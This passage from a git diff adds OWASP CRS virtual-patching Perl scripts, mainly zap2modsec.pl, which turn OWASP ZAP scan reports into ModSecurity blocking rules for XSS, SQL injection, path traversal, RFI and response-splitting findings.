$type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_BLIND_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_LFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_RFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_HTTPRS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + } +} + +sub get_uricontent +{ + my($url) = @_; + my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; + + # First, trim the first part out of the URL: + # http://.../ + $url =~ /$regex/; + substr($url,index($url,$&),length($&)) = ""; + + # If the URL contains a php or cgi query with + # one or more params and values, trim those out. + # Trim from the question mark to the end. + if($url =~ /\?/){ + substr($url,index($url,"?")) = ""; + } + return $url; + +} diff --git a/nginx/config/owasp-crs/util/virtual-patching/zap2modsec.pl b/nginx/config/owasp-crs/util/virtual-patching/zap2modsec.pl new file mode 100755 index 00000000..03fa21e0 --- /dev/null +++ b/nginx/config/owasp-crs/util/virtual-patching/zap2modsec.pl @@ -0,0 +1,318 @@ +#!/opt/local/bin/perl -T + +############################################# +# -=[ Virtual Patching Converter Script ]=- # +# Converts OWASP ZAP XML Output # +# https://code.google.com/p/zaproxy/ # +# # +# zap2modsec.pl # +# Version: 1.0 # +# # +# Copyright 2011 # +# Trustwave's SpiderLabs Research Team # +# www.trustwave.com # +# # +# Based On Code Originally Created by: # +# The Denim Group # +# www.denimgroup.com # +############################################# + +use XML::Smart; +use Switch; +use Data::Types qw(:all); +use Data::Validate::URI qw(is_uri); +use Getopt::Std; +use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later + +############# +# Variables # +############# + +# [Configuration Vars] +my %param; +getopt("f",\%param); +$filename = $param{f}; +my $all_vulnerabilities_filename = "$filename"; + +unless ($filename) { + print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n"; + exit; +} + + +my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; + +# [End Config Vars] + +my $VULN_CLASS_XSS = "Cross Site Scripting"; +my $VULN_CLASS_SQLI = "SQL Injection"; +my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting"; +my $VULN_CLASS_LFI = "Path Traversal"; +my $VULN_CLASS_RFI = "Remote File Inclusion"; +my $VULN_CLASS_HTTPRS = "HTTP Response Splitting"; + +# Only the vulnerabilities in this array will have +# rules generated for them. +my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); + +my $num_rules_generated=0; +my $num_not_supported=0; +my $num_bad_urls=0; + +my $wait_for_keypress=1; +my $request_failed=0; + +my $all_vulns_xml; +my @type; +my @id; +my $vuln_count; + +my $num_attacks_flag=0; +my $num_attacks_noflag=0; + +# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +############# +# Main # +############# + +# Clean up env so perl doesn't complain +# when trying to run the restart snort +# script. +delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; + +$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); + +@type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert'); +@url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri'); +@param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param'); + +open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; +$MODSEC_RULES->autoflush(1); + +$vuln_count = 0; + +foreach my $current_type (@type){ + print "==================================================================================================\n"; + print "Vulnerability[$vuln_count] - Type: $current_type\n"; + + if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ + parseData(to_string($current_type)); + }else { + print "Vulnerability Type: $type is not supported in this version.\n"; + $num_not_supported++; + } + $vuln_count++; +} + +close($MODSEC_RULES); + +print "==================================================================================================\n"; + +print "\n\n************ END OF SCRIPT RESULTS *****************\n"; +print "Number of Vulnerabilities Processed: $vuln_count\n"; +print "Number of ModSecurity rules generated: $num_rules_generated\n"; +print "Number of Unsupported vulns skipped: $num_not_supported\n"; +print "Number of bad URLs (rules not gen): $num_bad_urls\n"; +print "****************************************************\n\n"; +print "----------------------------------------------------\n"; +print "To activate the virtual patching file ($modsec_rules_file),\n"; +print "copy it into the CRS \"base_rules\" directory and then create\n"; +print "a symlink to it in the \"activated_rules\" directory.\n"; +print "-----------------------------------------------------\n\n"; + + +############### +# Subroutines # +############### +sub parseData +{ + my($vuln_str) = @_; + my $vuln_detail_filename; + my $current_vuln_xml; + my $current_vuln_url; + my $current_vuln_param; + my $current_uricontent; + my @current_params; + my $id = $vuln_count; + + print "Found a $vuln_str vulnerability.\n"; + + $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); + $current_vuln_url = $url[$vuln_count]; + + print URL_LIST "$current_vuln_url\n"; + + # Validate url (need separate sub?) + print "Validating URL: $current_vuln_url\n"; + if(is_uri(to_string($current_vuln_url))){ + print "URL is well-formed\n"; + print "Continuing Rule Generation\n"; + } else { + print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; + $num_bad_urls++; + + # Waits for keypress in test mode so you can + # see why the URL failed validation. + if($test_mode){ + wait_for_keypress(); + } + return; + } + + $current_uricontent = get_uricontent($current_vuln_url); + + + # Only need param if XSS attack,SQLINJ,XPATH + # and maybe for HTTPRS, DT. + # NOT for PRL and DI + + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + @current_params = $param[$vuln_count]; + + } + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + print "Current vulnerable Param(s): @current_params\n"; + } + + generate_patch($vuln_str,$current_uricontent,@current_params); + + +} + + +sub generate_patch +{ + my($type,$uricontent,@params,$current_vuln_xml) = @_; + my $rule = ""; + $id = "1".$vuln_count; + + switch($type) + { + case ($VULN_CLASS_XSS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + # Check to see if each vulnerable parameter is valid + # then generate a rule using both uricontent and the + # parameter + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + } + } + } + } + + case ($VULN_CLASS_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_BLIND_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_LFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_RFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_HTTPRS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + } +} + +sub get_uricontent +{ + my($url) = @_; + my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; + + # First, trim the first part out of the URL: + # http://.../ + $url =~ /$regex/; + substr($url,index($url,$&),length($&)) = ""; + + # If the URL contains a php or cgi query with + # one or more params and values, trim those out. + # Trim from the question mark to the end. + if($url =~ /\?/){ + substr($url,index($url,"?")) = ""; + } + return $url; + +}